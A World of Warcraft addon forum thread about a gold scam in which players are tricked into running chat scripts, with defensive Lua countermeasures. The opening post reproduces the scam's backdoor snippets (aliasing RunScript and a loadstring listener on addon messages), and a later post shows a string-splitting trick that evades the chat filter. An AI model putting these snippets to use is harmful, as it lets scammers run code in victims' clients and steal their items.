AcceptTrade gold scamming, catching hardware events

Ketho · 07-13-16, 11:38 PM

There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim

Code:

/run RemoveExtraSpaces = RunScript

Whispered to victim

Code:

local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")

Addon channel

Code:

SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible counter measures:

Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()

Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110

Lua Code:

local addonName = ...
local f = CreateFrame("Frame")
local db
 
local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
local msg_warn = msg..".\n\nClick anywhere to /reload."
local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."
 
StaticPopupDialogs.SAFETRADE_WARNING = {
    text = "%s",
    button1 = OKAY,
    exclusive = 1, whileDead = 1, showAlert = 1,
}
 
function f:OnEvent(event, addon)
    if addon == addonName then
        SafeTradeDB = SafeTradeDB or {}
        db = SafeTradeDB -- init savedvars
        if db.warning then
            StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
            db.warning = nil
        end
        self:SetHook("RunScript")
    
    elseif addon == "Blizzard_DebugTools" then
        self:SetHook("DevTools_DumpCommand")
    end
end
 
function f:SetHook(func)
    hooksecurefunc(func, function()
        if _G[func] == RemoveExtraSpaces then
            -- reload asap, they cant be that fast ... right?
            db.warning = "RemoveExtraSpaces"
            StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
            self:CatchHW()
        end
    end)
end
 
local btn
 
function f:CatchHW()
    if not btn then
        btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
        btn:SetAllPoints(UIParent)
        btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
        btn:SetAttribute("macrotext", "/reload")
        --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
        
        btn:SetFrameStrata("TOOLTIP")
        btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
    end
end
 
f:RegisterEvent("ADDON_LOADED")
f:SetScript("OnEvent", f.OnEvent)

myrroddin · 07-13-16, 11:58 PM

Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

Or, if you want to be evil, send that same message back to the source, and scam the scammer?

Ketho · 07-14-16, 12:18 AM

Originally Posted by myrroddin

Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious

Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char

Resike · 07-14-16, 02:00 PM

Originally Posted by Ketho

That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious

Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char

Wouln't work the "CHAT_MSG_ADDON" event gets executed in some kinda order and if the malware is faster then you're still fucked.

myrroddin · 07-14-16, 07:02 AM

Yes, during the check/exit phase, you can unregister the prefix. While there is no direct API either natively or with Ace3, I would presume registering "" would do the trick. Wrap it within an if/then so you don't accidentally re-register something you'd want!

While true, the scammer could use a compromised character (of any level), the social hack indicates the scammer would be max level. Afterall, who'd join a raid group for the moose, if you were being invited by someone level 1-99?

As for hacking the hacker, why not? If the message is the scam, then send the scam right back to the hacker. And if the toon has been compromised, the true owner will get fixed up by Blizzard's customer support.

I don't see any issues with this, but I'm evil.

Lombra · 07-14-16, 08:45 AM

Why would the scammer themself be listening for incoming addon messages?

AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?

Kanegasi · 07-14-16, 03:37 PM

What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.

Ketho · 07-14-16, 05:17 PM

Originally Posted by Lombra

AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?

Yes, they are being tricked into executing that by catching any hardware events with a secure frame
I don't know how exactly they do that, but I could only manage catching any left-clicks

Originally Posted by Kanegasi

What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.

Good idea. Or maybe without wiping the global one to nil, to not break any other Trade UI related addons.

Lua Code:

local oldAcceptTrade = AcceptTrade
 
function AcceptTrade()
    if RunScript ~= RemoveExtraSpaces then
        oldAcceptTrade()
    end
end
 
TradeFrameTradeButton:SetScript("OnClick", AcceptTrade)

It might be really obvious, but why is RemoveExtraSpaces not a local scope function

It's only being used in ChatFrame.lua

@Resike: So there is no way to stop an addon message before it already has done the damage?

Edit: It looks like Blizzard is already checking for any suspicious whisper messages?

It's not possible to say "loadstring" anymore in chat channels, including whisper

But they could still whisper something like

Lua Code:

pcall(_G["load".."string"](msg))

Resike · 07-14-16, 06:38 PM

Originally Posted by Ketho

@Resike: So there is no way to stop an addon message before it already has done the damage?

I'm not sure how does it works, it could be served alphabetically or based on time when the event is registered or a combination of this two, it even could be serving faster/smaller functions first and the bigger ones later. It's specially hard to reverse engineer it if the code does't comes from an addon but from a in-game script.

SDPhantom · 07-15-16, 10:40 AM

When it comes to the chat system, there are many attack vectors they can eventually move to with ease. One thing that can be done is completely nullify the RunScript() and DevTools_DumpCommand() functions while a chat event is being handled.

Lua Code:

local FuncList={
    "RunScript";
    "DevTools_DumpCommand";
};
 
local FuncCache={};
for k,v in ipairs(FuncList) do FuncCache[v]=_G[v]; end
 
local function DummyFunc() end
local OldHandler=ChatFrame_OnEvent;
local InChatEvent=false;
 
local EventFrame=CreateFrame("Frame");
EventFrame:RegisterEvent("ADDON_LOADED");
EventFrame:SetScript("OnEvent",function()
    for k,v in ipairs(FuncList) do
        if not FuncCache[v] then
            FuncCache[v]=_G[v];
            if InChatEvent then _G[v]=DummyFunc; end
        end
    end
end);
 
function ChatFrame_OnEvent(...)
    for k,v in pairs(FuncCache) do _G[k]=DummyFunc; end
    InChatEvent=true;
    OldHandler(...);
    InChatEvent=false;
    for k,v in pairs(FuncCache) do _G[k]=v; end
end

To protect more functions, add them to the FuncList table.